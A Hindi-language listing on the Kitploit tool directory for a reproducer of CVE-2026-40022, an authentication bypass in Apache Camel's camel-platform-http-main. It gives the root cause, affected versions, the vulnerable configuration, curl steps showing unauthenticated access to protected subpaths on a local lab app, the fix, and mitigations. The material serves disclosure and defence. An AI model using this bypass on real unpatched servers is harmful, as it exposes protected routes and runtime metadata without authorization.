Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-40022 — CVE-2026-40022 के लिए रिप्रोड्यूसर: Apache Camel camel-platform-http-main गैर-रूट संदर्भ पथों पर प्रमाणीकरण बाईपास | Kitploit
उपकरण/GitHubGitHub/oscerd/cve-2026-40022
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणगलत कॉन्फ़िगरेशन
GitHuboscerd/cve-2026-40022

CVE-2026-40022

CVE-2026-40022 के लिए रिप्रोड्यूसर: Apache Camel camel-platform-http-main गैर-रूट संदर्भ पथों पर प्रमाणीकरण बाईपास

रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

camel-platform-http-main गैर-रूट संदर्भ पथों पर प्रमाणीकरण बाईपास (CVE-2026-40022)

यह प्रोजेक्ट Apache Camel के camel-platform-http-main घटक (Camel main रनटाइम का एम्बेडेड HTTP / प्रबंधन सर्वर) में एक प्रमाणीकरण बाईपास प्रदर्शित करता है, जिसे CVE-2026-40022 के रूप में ट्रैक किया गया है। जब प्रमाणीकरण सक्षम होता है और एक गैर-रूट संदर्भ पथ (जैसे /api या /admin) कॉन्फ़िगर किया जाता है, तो प्रमाणीकरण हैंडलर केवल सटीक संदर्भ पथ को कवर करता है, इसलिए उपपथों पर अप्रमाणित अनुरोध संरक्षित रूट्स और प्रबंधन एंडपॉइंट्स तक पहुँच जाते हैं।

परामर्श: https://camel.apache.org/security/CVE-2026-40022.html

भेद्यता सारांश

गुणमान
घटकcamel-platform-http-main (Camel main runtime एम्बेडेड HTTP/प्रबंधन सर्वर)
प्रभावित वर्गBasicAuthenticationConfigurer, JWTAuthenticationConfigurer, MainAuthenticationConfigurer
मूल कारणजब authenticationPath सेट नहीं होता है तो यह camel.server.path से प्राप्त होता है; Vert.x सब-राउटर माउंटिंग मॉडल के साथ प्रमाणीकरण हैंडलर केवल सटीक संदर्भ पथ से मेल खाता है, इसके उपपथों से नहीं
CWECWE-287: अनुचित प्रमाणीकरण (प्रमाणीकरण बाईपास)
प्रभावसंरक्षित व्यावसायिक रूट्स और प्रबंधन एंडपॉइंट्स (जैसे /observe/info रनटाइम-मेटाडेटा प्रकटीकरण) तक अप्रमाणित पहुँच
प्रभावित संस्करण4.14.1 से पहले 4.14.6 तक, और 4.15.0 से पहले 4.18.2 तक
निश्चित संस्करण4.14.6, 4.18.2, 4.20.0
रिपोर्टरJihang Yu
PRsapache/camel#22474 (main), #22475 (4.18.x), #22476 (4.14.x)

तकनीकी विवरण

BasicAuthenticationConfigurer (और JWTAuthenticationConfigurer) उस पथ को हल करते हैं जिसे प्रमाणीकरण हैंडलर properties.getAuthenticationPath() से सुरक्षित करता है, और जब यह स्पष्ट रूप से सेट नहीं होता है तो properties.getPath() ( camel.server.path संदर्भ पथ) पर वापस आ जाता है:

root@kitploit:~
String path = resolveAuthenticationPath(properties.getAuthenticationPath(), properties.getPath());

Vert.x सर्वर <contextPath>* पर एक सब-राउटर माउंट करता है और प्रमाणीकरण हैंडलर को उस सब-राउटर के अंदर हल किए गए पथ पर पंजीकृत करता है। प्रभावित संस्करणों में हल किया गया पथ स्वयं संदर्भ पथ होता है, इसलिए — पहले से /api पर माउंट किए गए सब-राउटर के सापेक्ष — प्रमाणीकरण हैंडलर प्रत्येक उपपथ के बजाय /api/api से मेल खाता है। परिणामस्वरूप:

  • /api/api चुनौती दी जाती है (401) — हैंडलर मौजूद है, बस गलत-स्कोप किया गया है
  • /api/hello (वास्तविक व्यावसायिक रूट) चुनौती नहीं दी जाती है → बिना क्रेडेंशियल्स के परोसा जाता है

फिक्स resolveAuthenticationPath को /* लौटाने पर मजबूर करता है, ताकि हैंडलर सब-राउटर के सभी उपपथों को कवर करे।

सेटअप

application.properties — प्रमाणीकरण सक्षम और authenticationPath सेट न होने पर एक गैर-रूट संदर्भ पथ:

root@kitploit:~
camel.server.enabled = true
camel.server.port = 8080
camel.server.path = /api
camel.server.authenticationEnabled = true
camel.server.basicPropertiesFile = auth.properties

रूट /api/hello पर परोसा जाता है।

आवश्यक शर्तें

  • Java 17+
  • Maven 3.8+

कोई बाहरी सेवा या Docker कंटेनर आवश्यक नहीं है — कमजोर HTTP सर्वर स्वयं ऐप है।

पुनरुत्पादन चरण

चरण 1: निर्माण और प्रारंभ

root@kitploit:~
mvn clean package -DskipTests
java -jar target/cve-2026-40022-platform-http-main-0.0.1-SNAPSHOT.jar

चरण 2: दिखाएँ कि प्रमाणीकरण सक्षम है

root@kitploit:~
curl -i http://localhost:8080/api/api
# -> HTTP/1.1 401 Unauthorized
#    WWW-Authenticate: Basic realm="vertx-web"

BasicAuthHandler सक्रिय है — लेकिन सटीक संदर्भ पथ पर गलत-स्कोप किया गया है।

चरण 3: बाईपास — बिना क्रेडेंशियल्स के संरक्षित रूट तक पहुँचें

root@kitploit:~
curl -i http://localhost:8080/api/hello
# -> HTTP/1.1 200 OK
#    hello-response (this is a PROTECTED business route)

एक निश्चित संस्करण (4.14.6 / 4.18.2 / 4.20.0) पर यह 401 अनधिकृत लौटाता है।

चरण 4: क्रेडेंशियल्स के साथ यह भी काम करता है (जैसा इरादा है)

root@kitploit:~
curl -i -u camel:propertiesPass http://localhost:8080/api/hello
# -> HTTP/1.1 200 OK

प्रभाव: प्रबंधन एंडपॉइंट प्रकटीकरण

यही दोष प्रबंधन सर्वर (camel.management.path, जैसे /admin) पर भी लागू होता है। एक उपपथ जैसे /admin/observe/info पर एक अप्रमाणित अनुरोध प्रबंधन एंडपॉइंट तक पहुँचता है, जो रनटाइम मेटाडेटा प्रकट कर सकता है: OS उपयोगकर्ता, काम/होम निर्देशिका, प्रक्रिया आईडी, JVM और OS जानकारी।

शोषण की स्थितियाँ

  1. Camel main रनटाइम camel-platform-http-main के साथ।
  2. सर्वर या प्रबंधन सर्वर पर प्रमाणीकरण सक्षम होना चाहिए।
  3. एक गैर-रूट संदर्भ पथ (camel.server.path / camel.management.path)।
  4. camel.server.authenticationPath / camel.management.authenticationPath स्पष्ट रूप से सेट न हो।

अनुशंसित सुधार

4.14.6 / 4.18.2 / 4.20.0 पर अपग्रेड करें। फिक्स (resolveAuthenticationPath) प्रमाणीकरण हैंडलर को प्रत्येक उपपथ को कवर करने पर मजबूर करता है:

root@kitploit:~
default String resolveAuthenticationPath(String authenticationPath, String contextPath) {
    if (authenticationPath != null && !authenticationPath.isBlank()) {
        return authenticationPath;
    }
    return "/*";   // was: the exact context path
}

शमन

अपग्रेड करने तक:

  1. स्पष्ट रूप से सेट करें camel.server.authenticationPath = /* (और camel.management.authenticationPath = /*) ताकि हैंडलर सभी उपपथों को कवर करे।
  2. प्रबंधन सर्वर को केवल एक विश्वसनीय नेटवर्क पर रखें।

फ़ाइलें

root@kitploit:~
CVE-2026-40022/
├── pom.xml
├── README.md
└── src/main/
    ├── java/com/example/
    │   ├── Application.java          # Camel main runtime entry point
    │   └── HelloRoute.java           # a protected platform-http route (/api/hello)
    └── resources/
        ├── application.properties    # non-root path + auth enabled (the vulnerable config)
        └── auth.properties           # basic-auth user (camel / propertiesPass)

अस्वीकरण

यह पुनरुत्पादक केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए प्रदान किया गया है, एक सार्वजनिक रूप से प्रकट और निश्चित भेद्यता के लिए। इसे स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।

टूल डाउनलोड करें